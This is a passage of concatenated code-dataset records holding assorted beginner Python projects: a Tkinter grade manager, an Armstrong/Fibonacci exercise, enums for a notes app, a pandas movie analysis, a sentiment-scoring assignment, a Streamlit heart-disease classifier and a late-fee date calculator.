aglast.get())\n\t\tnotaest.append(agnota.get())\n\t\t\"\"\"print(nomest)\n\t\tprint(agnom.get())\n\t\tprint(len(nomest))\n\t\tprint(notaest)\n\t\tprint(agnota.get())\n\t\tprint(len(notaest))\"\"\"\n\n#BUSCAR ESTUDIANTE\ndef buscar():\n\tif(len(nomest)==0):\n\t\ttop = messagebox.showerror('Error', \"No se han ingresado estudiantes todavía.\")\n\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Buscar estudiante\")\n\t\ttop.geometry(\"700x205\")\n\t\tLabel(top,text=\"Introduzca el nombre completo del estudiante por buscar:\").place(x=0,y=0)\n\t\tEntry(top, bd=5,bg='white', textvariable=busnom, fg='black').place(x=0,y=30)\n\t\tLabel(top, textvariable=busnota).place(x=0,y=60)\n\t\t\n\t\t#BOTÓN BUSCAR\n\t\tButton(top,text= \"Buscar\",command=buscar2).place(x=0,y=180)\n\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=60,y=180)\n\ndef buscar2():\n\tcontrol = search(nomest, busnom.get())\n\tif(control == 1234):\n\t\tbusnota.set(\"El estudiante que busca no está registrado.\")\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\n\telse:\n\t\tbusnota.set(\"La nota del estudiante \" + nomest[control] + \" es \" + str(notaest[control]) + \".\")\n\ndef search(list, name):\n\tfor i in range(len(list)):\n\t\tif list[i] == name:\n\t\t\treturn i\n\treturn 1234\n\n#MODIFICAR NOTA\ndef modificar():\n\tif(len(nomest)==0):\n\t\tmessagebox.showerror(\"Error\", \"No se han ingresado estudiantes todavía\")\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Modificar Nota\")\n\t\ttop.geometry(\"700x205\")\n\t\tLabel(top, text=\"Introduzca el nombre completo del estudiante por cambiar de nota:\").place(x=0,y=0)\n\t\tEntry(top, bd=5,bg='white', textvariable=modnom, fg='black').place(x=0,y=30)\n\t\tLabel(top, text=\"Introduzca la nueva nota:\").place(x=0,y=60)\n\t\tEntry(top, bd=5,bg='white', textvariable=modnota, fg='black').place(x=0,y=90)\n\t\t#BOTÓN BUSCAR\n\t\tButton(top,text= \"Modificar\",command=modificar2).place(x=0,y=140)\n\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=70,y=140)\n\ndef modificar2():\n\tcontrol = search(nomest, modnom.get())\n\tif(control == 1234):\n\t\tbusnota.set(\"El estudiante que busca no está registrado.\")\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\telif((modnota.get()<0)) or (modnota.get()>100):\n\t\tmessagebox.showerror(\"Error\", \"La nota que desea ingresar está fuera del intervalo deseado\")\n\telse:\n\t\tv = notaest[control]\n\t\tnotaest[control]=modnota.get()\n\t\tbusnota.set(\"La nota del estudiante \" + nomest[control] + \" es \" + str(notaest[control]) + \".\")\n\t\tmessagebox.showerror(\"Éxito\", \"La nota ha sido modificada exitosamente de \"+str(v)+\" a \"+str(notaest[control])+ \".\")\n\n#LISTADO POR NOMBRE\ndef Lnombre():\n top= Toplevel()\n top.title(\"Listado por Nombre de estudiantes\")\n top.geometry(\"900x200\")\n nombres = nomest\n Label(top,text=\"Listado de los estudiantes por nombre: \").place(x=0,y=0)\n if (len(nomest)==0):\n messagebox.showerror(\"Error\", \"No se han registrado estudiantes\")\n else:\n for i in range(len(nombres)):\n nombres.sort()\n Label(top,text=nombres).place(x=0,y=25)\n #BOTÓN ACEPTAR\n Button(top,text= \"Aceptar\",command=top.destroy).place(x=2,y=150)\n\n#BUSCAR ESTUDIANTE\ndef Lnotas():\n\tif(len(nomest)==0):\n\t\ttop = messagebox.showerror('Error', \"No se han ingresado estudiantes todavía.\")\n\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Orden por notas\")\n\t\ttop.geometry(\"700x205\")\n\t\tLabel(top, text = \"Listado de estudiantes en orden ascendente de notas:\").grid(row=0, column=0, columnspan=10)\n\t\t \n\t\tnomcopy = nomest.copy()\n\t\tnotacopy = notaest.copy()\n\t\tfor i in range(len(notacopy)):\n\t\t\tfor m in range(len(notacopy)):\n\t\t\t\tp = notacopy[m]\n\t\t\t\tq = nomcopy[m]\n\t\t\t\tif(notacopy[m] > notacopy[i]):\n\t\t\t\t\tnotacopy[m] = notacopy[i]\n\t\t\t\t\tnotacopy[i] = p\n\t\t\t\t\tnomcopy[m] = nomcopy[i]\n\t\t\t\t\tnomcopy[i] = q\t\n\t\tprint(nomcopy)\n\t\tprint(notacopy)\t\n\n\t\tfor i in range(len(notacopy)):\t \n\t\t\tLabel(top, text = nomcopy[i]).grid(row=(i+2), column=0, sticky=W)\n\t\t\tLabel(top, text = str(notacopy[i])).grid(row=(i+2), column=1, sticky=W)\n\n\n#MEDIA DE NOTAS\ndef media():\n\tif (len(notaest)==0):\n\t\tmessagebox.showerror(\"Error\", \"No se han registrado estudiantes\")\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Media de las notas\")\n\t\ttop.geometry(\"400x100\")\n\t\tmedia1()\n\t\tLabel(top,text=\"El valor de la media total de los estudiantes en el sistema es de:\").place(x=0,y=0)\n\t\tLabel(top, text=mediatotal.get()).place(x=0,y=30)\n\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=0,y=60)\n\ndef media1():\n\tn=0\n\tfor i in range(len(notaest)):\n\t\t\tn=notaest[i]+n\n\tmedia= n/len(notaest)\n\tmediatotal.set(media)\n\n\n#ELIMINAR ESTUDIANTE\ndef eliminar():\n\tif(len(nomest)==0):\n\t\ttop = messagebox.showerror('Error', \"No se han ingresado estudiantes todavía.\")\n\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Eliminar estudiante\")\n\t\ttop.geometry(\"500x205\")\n\t\tLabel(top,text=\"Introduzca el nombre completo del estudiante para eliminarlo:\").place(x=0,y=0)\n\t\tEntry(top, bd=5,bg='white', textvariable=eliminarnom, fg='black').place(x=0,y=30)\n\n\t\t#BOTÓN BUSCAR\n\t\tButton(top,text= \"Eliminar\",command=eliminar2).place(x=0,y=180)\n\ndef eliminar2():\n\tcontrol = search(nomest, eliminarnom.get())\n\tif(control == 1234):\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\t\t\n\telse:\n\t\tp=nomest[control]\n\t\tt=notaest[control]\n\t\tnomest.pop(control)\n\t\tnotaest.pop(control)\n\t\tmessagebox.showinfo(\"Operación exitosa\", \"El estudiante \" + p + \" con nota de \" + str(t) + \" ha sido eliminado exitosamente.\")\n\n\ndef eliminar2():\n\tcontrol = search(nomest, eliminarnom.get())\n\tif(control == 1234):\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\n\telse:\n\t\tt= notaest[control]\n\t\tp=nomest[control]\n\t\tnotaest.pop(control)\n\t\tnomest.pop(control)\n\t\tmessagebox.showerror(\"Éxito\", \"El estudiante \" +p+\" con nota de \" + str(t) + \" ha sido eliminado exitosamente\")\n#FUNCIONES DE CADA RADIOBUTTON\ndef elegir():\n if opcion.get()==1:\n agregar()\n elif opcion.get()==2:\n buscar()\n elif opcion.get()==3:\n modificar()\n elif opcion.get()==4:\n Lnombre()\n elif opcion.get()==5:\n Lnotas()\n elif opcion.get()==6:\n media()\n elif opcion.get()==7:\n eliminar()\n \n#VARIABLES Y LISTAS\nnomest = []\nnotaest = []\nopcion = IntVar()\n\n#VARIABLES PARA FUNCIÓN AGREGAR \nagnom = StringVar()\naglast = StringVar()\nagnota = DoubleVar()\n#VARIABLES PARA FUNCIÓN MEDIA\nmediatotal =DoubleVar()\nmediatotal.set(0)\n#VARIABLES PARA FUNCIÓN BUSCAR\nbusnom = StringVar()\nbusnota = StringVar()\nbusnota.set('')\n#VARIABLES PARA FUNCIÓN MODIFICAR\nmodnom= StringVar()\nmodnota=DoubleVar()\nopcion.set(0)\neliminarnom= StringVar()\n#CREAR LOS RADIOBUTTONS\nLabel(app, text=\"¿Qué desea realizar?\", anchor =W).grid (row=2, column=0, sticky=W)\n\nRadiobutton(app, text =\"Añadir estudiantes\", value=1,variable=opcion, command=marcar).grid(row=3, column=0, sticky=W)\nRadiobutton(app, text =\"Buscar estudiantes\", value=2, variable=opcion,command=marcar).grid(row=5, column=0, sticky=W)\nRadiobutton(app, text =\"Modificar nota\", value=3,variable=opcion, command=marcar).grid(row=6, column=0, sticky=W)\nRadiobutton(app, text =\"Listado de estudiantes ordenados por nombre\", value=4,variable=opcion, command=marcar).grid(row=7, column=0, sticky=W)\nRadiobutton(app, text =\"Listado de estudiantes ordenado por notas\", value=5,variable=opcion, command=marcar).grid(row=8, column=0, sticky=W)\nRadiobutton(app, text =\"Mostrar la media de la notas\", value=6,variable=opcion, command=marcar).grid(row=9, column=0, sticky=W)\nRadiobutton(app, text =\"Borrar un estudiante\", value=7,variable=opcion, command=marcar).grid(row=10, column=0, sticky=W)\n\nmarcado = Label(app)\nboton= Button(app,text= \"Aceptar\",command=elegir)\nboton.grid(row=12, column=0, sticky=E+W)\n\napp.mainloop()\n\n","repo_name":"jose137sp/sist-estudiantes-py","sub_path":"problema1.py","file_name":"problema1.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8862596703","text":"s1=input(\"Enter the number\")\r\nl1=[]\r\nl1=list(map(int,s1))\r\nn1=int(s1)\r\nsum=0\r\nfor i in range(len(l1)):\r\n sum=sum+l1[i]**len(s1)\r\nif(sum==n1):\r\n print(\"Armstrong\")\r\nelse:\r\n print(\"Not Armstrong\")\r\n#fibonacci\r\ndef fibonaccise(a,b,n):\r\n if n==0:\r\n return \r\n else:\r\n c=a+b\r\n print(c)\r\n a=b\r\n b=c\r\n fibonaccise(a,b,n-1)\r\nn=int(input(\"Enter the number:\" ))\r\na=0\r\nb=1\r\nc=0\r\nprint(a)\r\nprint(b)\r\nprint(\"recursion\")\r\nn=n-2\r\nfibonaccise(a,b,n)\r\nprint(\"Non recursion\")\r\nfor i in range(n):\r\n c=a+b\r\n print(c)\r\n a=b\r\n b=c\r\n#recursion\r\n#prime\r\n print(\"Hello World\")\r\nn1=int(input(\"Enter number\"))\r\nprime=True\r\nfor i in range(2,n1):\r\n if(n1%1==0):\r\n prime=False\r\nprint(prime)","repo_name":"Alekya-9118/Practiceproblems","sub_path":"armstring.py","file_name":"armstring.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72659534273","text":"from enum import Enum\n\n\nclass NotesOrderByEnum(Enum):\n\t\"\"\"\n\tСортировка заметок пользователя по дате\n\t\"\"\"\n\tdate_asc = \"date\"\n\tdate_desc = \"-date\"\n\n\nclass NotesPeriodEnum(Enum):\n\t\"\"\"\n\tФильтрация по дате (например, upcoming - заметки/задачи после сегодняшнего дня).\n\t\"\"\"\n\tupcoming = \"upcoming\"\n\tpast = \"past\"\n\tall = \"all\"\n\n\nclass NotesCompletedEnum(Enum): # if notes type is \"task\"\n\t\"\"\"\n\tФильтрация по статусу исполнения.\n\tСработает только если выбран тип заметок \"task\" (\"задача\").\n\t\"\"\"\n\tcompleted = True # upcoming task may be completed before their date\n\tnon_completed = False\n\tall = None\n\n\nclass NoteTypeEnum(Enum):\n\t\"\"\"\n\tФильтрация по типу заметок.\n\t\"\"\"\n\tnote = \"note\"\n\ttask = \"task\"\n\tall = \"all\"\n\n\nclass NoteTypeEnumDB(Enum):\n\t\"\"\"\n\tЗаметка может быть стандартной заметкой, а может - задачей.\n\tЭтот Enum для модели SA.\n\t\"\"\"\n\tnote = \"note\"\n\ttask = \"task\"\n\n\nclass PollingTypeEnum(Enum):\n\t\"\"\"\n\tТипы рандомных опроса для пользователя.\n\n\tПримеры опросов:\n\t- Note: \"Вам помогают или помогли сегодня заметки?\" (если по текущему дню они были);\n\t- Task: \"Сегодня получилось выполнить все задачи?\" (если были);\n\t- Health: \"Ваше самочувствие сегодня удовлетворительное?\";\n\t- Next_Day_Expectations: \"Завтра будет хороший день?\";\n\t- Mood: \"Какое сегодня было настроение?\".\n\t\"\"\"\n\tnote = \"note\"\n\ttask = \"task\"\n\thealth = \"health\"\n\tnext_day_expectations = \"next_day_expectations\"\n\tmood = \"mood\"\n","repo_name":"Dahaka1/eztask","sub_path":"app/static/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16382725669","text":"def main():\n x = check_fuel()\n print(x)\n\n\ndef check_fuel():\n while True:\n try:\n numerator, denominator = input(\"Enter a fraction: \").split(\"/\")\n pctg = round((int(numerator)/int(denominator)) * 100)\n except ValueError:\n print(\"Invalid value, Try Again.\")\n except ZeroDivisionError:\n print(\"Cant divide by zero, Try Again.\")\n else:\n if int(pctg) <= 1:\n return \"E\"\n elif 99 <= int(pctg) <= 100:\n return \"F\"\n elif int(pctg) > 100:\n continue\n else:\n return f\"{int(pctg)}%\"\n\nmain()","repo_name":"OfirPicciotto/CS50P","sub_path":"pset3/fuel/fuel.py","file_name":"fuel.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10289961819","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0026_auto_20150609_2337'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='configuration',\n name='spark',\n field=models.ForeignKey(verbose_name=b'Spark', to='api.BrewPiSpark'),\n ),\n ]\n","repo_name":"thomast74/oinkbrew_webapp","sub_path":"api/migrations/0027_auto_20150609_2351.py","file_name":"0027_auto_20150609_2351.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72995956673","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 30 10:44:04 2016\n\n@author: Rohan\n\"\"\"\n\nnf = pd.read_csv('/Users/Rohan/Desktop/Code/pchall.csv')\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nnf.head()\nnf['Date'] = pd.to_datetime(nf[\"ReleaseDate\"])\nnf['DomesticTotalGross'] = nf['DomesticTotalGross'].astype(float)\nnf['Runtime'] = nf['Runtime'].astype(float)\n\nnf = nf.sort_values('Date')\nplt.plot_date(x=nf[\"Date\"], y=nf[\"DomesticTotalGross\"],fmt=\"r-\") \nplt.title(\"Timeseries\")\nplt.ylabel(\"Total\")\nplt.grid(True)\nplt.show()\n\n\nnf = nf.sort_values('Runtime')\nplt.plot(nf[\"Runtime\"],nf[\"DomesticTotalGross\"])\nplt.title(\"Runtime vs Gross\")\nplt.ylabel(\"Total\")\nplt.xlabel(\"Runtime\")\nplt.grid(True)\nplt.show()\n\n##Group your data by Rating and find the average runtime \n#and domestic total gross at each level of Rating.\n\n\nnf.groupby([\"Rating\"])[\"Runtime\", \"DomesticTotalGross\"].mean(). plot(subplots=True)\n\n\"\"\" \n Runtime DomesticTotalGross\nRating \nG 107.000000 2.684928e+08\nPG 99.933333 1.311357e+08\nPG-13 117.510638 1.114498e+08\nR 110.729730 6.989243e+07\n\n\"\"\"\n\n#Make one figure with (N=the number of MPAA ratings there are) \n#subplots, and in each plot the release date vs the domestic total gross.\n\n\n\npd.pivot_table(nf.reset_index(),\n index='Date', columns='Rating', values='DomesticTotalGross'\n ).plot(subplots=True, linestyle = '', marker = 'o')\n\n\n\nnf.groupby([\"Director\"])[\"DomesticTotalGross\"].mean().sort_values()\n#Francis Lawrence\n\n#Bin your dataset into months and make a bar graph of the mean domestic \n#total gross by month. Error bars will represent the standard error of the mean.\n\n#Title of graph should include: Mean Domestic Total Gross by Month in 2013\n\n#Topic for consideration: what is the correct \n#formula for the standard error of the mean? \n#Examine the error bars and see if they are \"reasonable.\"\n\n\nn = nf.groupby(pd.Grouper(key='Date', freq='M'))[\"DomesticTotalGross\"].mean()\nm = nf.groupby(pd.Grouper(key='Date', freq='M'))[\"DomesticTotalGross\"].std()\nm\n\nno = pd.DataFrame({'D':n.index, 'gross':n.values})\nmo = pd.DataFrame({'D':m.index, 'err':m.values})\n\nno.head()\nl1 = [1,2,3,4,5,6,7,8,9,10,11,12]\nno[\"month\"] = l1\n\n\n\nplt.title('Mean Domestic Total Gross by Month in 2013')\n \nplt.show()\n\n#######\nfig, ax = plt.subplots(1,1, figsize=(5,10))\nax.set_title('Mean Domestic Total Gross by Month in 2013')\nsns.barplot(x=no['month'].sort_values(), y=no['gross'], errwidth = 20, errcolor = \"r\")\nplt.errorbar(no.month, no.gross, mo.err, linestyle='None', marker='^')\nax.set_xlabel('Month')\nax.set_ylabel('Total')\n\n\n\n\n","repo_name":"YaoNiMing/privateML","sub_path":"challenges/02-pandas/submissions/rohans90/pandaschall.py","file_name":"pandaschall.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24415073673","text":"# File: ahmad_p1.py \r\n# Author: Arius Ahmad \r\n# Date: 11/7/22 \r\n# Section: 1003 \r\n# E-mail: arius.ahmad@maine.edu \r\n# Collaboration: I worked with McKade Wing (mckade.wing@maine.edu) and Teddy Morin (theodore.morin@maine.edu)\r\n\r\ndef CalcSent(userWord): # returns average sentiment score of an inputed word in movieReviews.txt\r\n movieFile = open(\"movieReviews.txt\")\r\n count = 0\r\n total = 0\r\n average = 0.0\r\n \r\n # This loop goes through every line in the file and splits it into a list of words, subLine, then for every word in subLine if the word is equal to the users word, it adds the sentiment score of that line to the total and adds one to a counter.\r\n for line in movieFile:\r\n subLine = line.split()\r\n for word in subLine:\r\n if word != \"0\" or word != \"1\" or word != \"2\" or word != \"3\" or word != \"4\":\r\n if word == userWord:\r\n total += int(subLine[0])\r\n count += 1\r\n # calculate average score of the word using total and count\r\n average = total/count\r\n \r\n movieFile.close()\r\n \r\n return userWord,count,average\r\n\r\ndef CalcAvg(): # returns average sentiment score of all words in an inputed file\r\n userFileName = input(\"Enter the name of the file with the words: \")\r\n userFile = open(userFileName)\r\n avgScoreList = []\r\n overTotal = 0.0\r\n overCount = 0\r\n \r\n # This loop goes through every line in the file and splits it into a list of words, subLine, then for every word in subLine, call the CalcSent() function and store the variables returned into temp variables\r\n for line in userFile:\r\n subLine = line.split()\r\n for word in subLine:\r\n if word != \"0\" or word != \"1\" or word != \"2\" or word != \"3\" or word != \"4\":\r\n tempWord,tempCount,tempAvg = CalcSent(word)\r\n # append average score of a single word to the avgScoreList\r\n avgScoreList.append(tempAvg)\r\n # get total of every average score of every word and store it in overTotal (overall Total)\r\n for i in avgScoreList:\r\n overTotal += i\r\n # get count of all the average scores in the list and store it in overCount (overall Count)\r\n overCount = len(avgScoreList)\r\n\r\n overAvg = overTotal / overCount\r\n \r\n userFile.close()\r\n\r\n # return the average score of all words together (overTotal / overCount) and the file name\r\n return overAvg, userFileName\r\n\r\ndef MostPosNeg(): # returns most postive and negative word in an inputed file and each of their scores \r\n userFileName = input(\"Enter the name of the file with the words: \")\r\n userFile = open(userFileName)\r\n wordList = []\r\n avgList = []\r\n\r\n # This loop goes through every line in the file and splits it into a list of words, subLine, then for every word in subLine, call the CalcSent() function and store the variables returned into temp variables\r\n for line in userFile:\r\n subLine = line.split()\r\n for word in subLine:\r\n if word != \"0\" or word != \"1\" or word != \"2\" or word != \"3\" or word != \"4\":\r\n tempWord,tempCount,tempAvg = CalcSent(word)\r\n # append the temp word into the wordList and the temp average into average list. The word and its corresponding score should line up between the list indexs\r\n wordList.append(tempWord)\r\n avgList.append(tempAvg)\r\n\r\n maxNum = 0.0\r\n minNum = 100.0\r\n maxWord = \"\"\r\n minWord = \"\"\r\n # finds the highest average score and its corresponding word in avgList\r\n for i in range(len(avgList)):\r\n if avgList[i] >= maxNum:\r\n maxNum = avgList[i]\r\n maxWord = wordList[i]\r\n # finds the lowest average score and its corresponding word in avgList \r\n for j in range(len(avgList)):\r\n if avgList[j] <= minNum:\r\n minNum = avgList[j]\r\n minWord = wordList[j]\r\n\r\n userFile.close()\r\n\r\n return userFileName,maxWord,maxNum,minWord,minNum\r\n\r\ndef main():\r\n task = 0\r\n while task != 4:\r\n task = int(input(\"What would you like to do? \\n 1. Calculate the sentiment score of a single word \\n 2. Calculate the average score of words in a file \\n 3. Find the highest and lowest scoring words in a file. \\n 4. Exit the program \\n Enter a number 1-4: \"))\r\n if task == 1:\r\n userWord = input(\"Enter a word: \")\r\n theWord,count,average = CalcSent(userWord)\r\n print(\"\\\"\"+theWord+\"\\\" appears\",count, \"times\")\r\n print(\"The average score for reviews containing \\\"\"+theWord+\"\\\" is\", average, \"\\n\")\r\n elif task == 2:\r\n avg, fileName = CalcAvg()\r\n if avg < 1.75:\r\n print(\"The average score of the words in \"+ fileName + \" is\",avg ,\"This is an insult.\\n\")\r\n elif avg > 2.25:\r\n print(\"The average score of the words in \"+ fileName + \" is\",avg ,\"This is a compliment.\\n\")\r\n else:\r\n print(\"The average score of the words in \"+ fileName + \" is\",avg ,\"This is neutral\\n\")\r\n elif task == 3:\r\n userFileName,maxWord,maxNum,minWord,minNum = MostPosNeg()\r\n print(\"The most positive word in \"+ userFileName +\" is\", maxWord, \"with a score of\", maxNum)\r\n print(\"The most negative word in \"+ userFileName +\" is\", minWord, \"with a score of\", minNum, \"\\n\")\r\n if task == 4:\r\n quit()\r\nmain()","repo_name":"Arius245/COS125-Projects","sub_path":"ahmad_p1.py","file_name":"ahmad_p1.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1282564062","text":"import pandas as pd\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom PIL import Image\nimport streamlit as st\n\nst.write(\"\"\"\n# Heart Failure Detection\n\"\"\")\nimage = Image.open('D:\\pythonProject\\ML\\Heart_failure\\heart.jpeg')\nst.image(image, caption='ML_Heart', use_column_width=True)\n\ndf = pd.read_csv('D:\\pythonProject\\ML\\Heart_failure\\heart.csv')\ndf.head()\n\n\ndf_eight = df[['Age','RestingBP','Cholesterol','FastingBS','MaxHR']]\n\nst.subheader('Data')\nst.dataframe(df_eight)\nst.write(df_eight.head())\n\nchart = st.line_chart(df_eight)\n\nX = df_eight.iloc[:, 0:5].values\nY = df_eight.iloc[:, -1].values\n#split to 75% training 25% testing\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25, random_state=0)\n\ndef get_user_input():\n Age = st.sidebar.slider('Age',0, 77, 50)\n RestingBP = st.sidebar.slider('RestingBP', 0, 200, 80)\n Cholesterol = st.sidebar.slider('Cholesterol', 0, 603, 150)\n FastingBS = st.sidebar.slider('FastingBS', 0, True)\n MaxHR = st.sidebar.slider('MaxHR', 0, 202, 60)\n\n user_data = {'Age':Age,\n 'RestingBP':RestingBP,\n 'Cholesterol':Cholesterol,\n 'FastingBS':FastingBS,\n 'MaxHR':MaxHR}\n\n features = pd.DataFrame(user_data, index=[0])\n return features\nuser = get_user_input()\n\nRandomForestClassifier = RandomForestClassifier()\nRandomForestClassifier.fit(X_train, Y_train)\n\nst.subheader('Model Score: ')\nst.write(str(accuracy_score(Y_test, RandomForestClassifier.predict(X_test))*100)+'%')\n\nprediction = RandomForestClassifier.predict(user)\n\n#Classification\nst.subheader('Classification')\nst.write(prediction)\n\n\n\n","repo_name":"despoina77/MachineLearning","sub_path":"Heart_failure/heart_failure.py","file_name":"heart_failure.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9330874468","text":"#Paul Kummer\n#CSIS 153\n#Program 10\n#Due 12/05/18\n\n__author__ = \"Paul Kummer\"\n__date__ = \"12/05/18\"\n\nfrom datetime import *\nfrom calendar import *\n\n\"\"\"\nDescription:\nV1:\nCreated functions to retrieve a year, month, and day that occured in the past.\nAdditionally, another function will calculate the difference between todays\ndate and the date entered. Error checking still needs to be implemented.\n\nV2:\nAllowed users to pass arguments into functions, and reverted to using datetime\ncalander limitations. Also, added getDailyFee and displayAmount Due functions\n\nV3:\n\"\"\"\n\n#global var\ntoday = date.today()\nprint(\"\\t### Today is {:} ###\\n\".format(today.strftime(\"%d %b, %Y\")))\n\n\ndef getYear(tmpUserYearStr=-1):\n\tnotValidYear = True\n\t\n\t#checks if user supplied an argument. Then prompts for input if no arg\n\tif tmpUserYearStr == -1:\n\t\ttmpUserYearStr = input(\"Please Enter a Year (example: 2018): \")\n\t\n\twhile notValidYear:\n\t\t\n\t\tif tmpUserYearStr == \"END\":\n\t\t\tnotValidYear = False\n\t\t\ttmpUserYearStr = -1\n\t\t\t\n\t\t#handles positive integers less than todays year, currently excludes zero\n\t\telif tmpUserYearStr.isdigit() and int(tmpUserYearStr) <= today.year\\\n\t\t\tand int(tmpUserYearStr) > 0:\n\t\t\tnotValidYear = False\n\t\t\t\n\t\t#handles negative integers, Does Not Work With BC Dates\n\t\t#elif tmpUserYearStr[1:].isdigit() and int(tmpUserYearStr) <= today.year\\\n\t\t#and not tmpUserYearStr[0] == \"-\":\n\t\t#\tnotValidYear = False\n\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Year Entry-\\n(Please enter an integer less than or equal to todays year)\")\n\t\t\ttmpUserYearStr = input(\"Please Enter a Year (example: 2018): \")\n\t\t\t\n\treturn int(tmpUserYearStr)\n\n\ndef getMonth(tmpUserMonthStr=-1):\n\tnotValidMonth = True\n\t\n\t#checks if user supplied an argument. Then prompts for input if no arg\n\tif tmpUserMonthStr == -1:\n\t\ttmpUserMonthStr = input(\"Please Enter a Month (example: 12): \")\n\t\n\twhile notValidMonth:\n\t\t\n\t\tif tmpUserMonthStr.isdigit() and int(tmpUserMonthStr) <= 12 and\\\n\t\t\tint(tmpUserMonthStr) > 0 and not tmpUserMonthStr.startswith(\"0\"):\n\t\t\tnotValidMonth = False\n\t\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Month Entry-\\n(Please enter an integer between 1-12 with no leading zeros)\")\n\t\t\ttmpUserMonthStr = input(\"Please Enter a Month (example: 12): \")\n\t\t\t\n\treturn int(tmpUserMonthStr)\n\t\n\t\ndef getDailyFee(tmpDailyFee=\"None\"):\n\tnotVaildFee = True\n\t\n\tif tmpDailyFee == \"None\":\n\t\ttmpDailyFee = input(\"What is the daily fee? (example 0.25): \")\n\t\n\twhile notVaildFee:\n\t\tif tmpDailyFee.count(\".\") <= 1:\n\t\t\tif tmpDailyFee[0] == \"-\":\n\t\t\t\tfor char in tmpDailyFee[1:]:\n\t\t\t\t\tvalidChars = True\n\t\t\t\t\tif not char.isdigit() or char == \".\":\n\t\t\t\t\t\tvalidChars = False\n\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tfor char in tmpDailyFee[1:]:\n\t\t\t\t\tvalidChars = True\n\t\t\t\t\tif not char.isdigit() or char == \".\":\n\t\t\t\t\t\tvalidChars = False\n\t\t\t\t\n\t\tif validChars == True:\n\t\t\tnotVaildFee = False\t\n\t\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Entry-\\n(Please Enter a Floating Number)\")\n\t\t\ttmpDailyFee = input(\"What is the daily fee? (example 0.25): \")\n\t\t\t\n\treturn float(tmpDailyFee)\n\t\t\t\t\n\n\n#from https://docs.python.org/3/library/calendar.html\n#monthcalendar(year, month)\ndef getDay (tmpYear,tmpMonth,tmpUserDayStr=-1):\n\tmonthObj = monthcalendar(tmpYear,tmpMonth)\n\tmaxMonthRange = max(monthObj[len(monthObj)-1])\n\tnotValidDay = True\n\t\n\t#checks if user supplied an argument. Then prompts for input if no arg\n\tif tmpUserDayStr == -1:\n\t\ttmpUserDayStr = input(\"Please Enter a Day (between 1 and {:}): \"\\\n\t\t\t.format(maxMonthRange))\n\t\n\twhile notValidDay:\n\n\t\tif tmpUserDayStr.isdigit() and int(tmpUserDayStr) <= maxMonthRange\\\n\t\tand int(tmpUserDayStr) > 0:\n\t\t\tnotValidDay = False\n\t\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Day Entry-\\n(Please enter an integer between 1 and {:})\"\\\n\t\t\t\t.format(maxMonthRange))\n\t\t\ttmpUserDayStr = input(\"Please Enter a Day (between 1 and {:}): \"\\\n\t\t\t\t.format(maxMonthRange))\n\t\t\t\n\treturn int(tmpUserDayStr)\n\n\ndef calcDiff (newestDate,oldestDate):\n\tdeltaDate = newestDate-oldestDate\n\tdeltaDaysInt = deltaDate.days\n\t\n\treturn deltaDaysInt\n\n\t\ndef calcLateFee(tmpDueDate,tmpCurDate,tmpDailyFee=0):\n\tdaysOverDue = calcDiff(tmpCurDate,tmpDueDate)\n\tbalanceIncurred = daysOverDue * tmpDailyFee\n\t\n\tif balanceIncurred < 0 or daysOverDue < 0:\n\t\tbalanceIncurred = 0\n\t\t\n\treturn float(balanceIncurred)\n\n\ndef displayTimePast():\n\tprint(\"\\n\\t:::: Calculate Time Past ::::\\n\")\n\tstayInLoop = True\n\t\n\twhile stayInLoop:\n\t\ttmpYear = getYear()\n\t\t\n\t\tif tmpYear == -1:\n\t\t\tstayInLoop = False\n\t\t\t\n\t\telse:\n\t\t\ttmpMonth = getMonth()\n\t\t\ttmpDay = getDay(tmpYear,tmpMonth)\n\t\t\ttmpDate = date(tmpYear,tmpMonth,tmpDay)\n\t\t\tdaysOfDifference = 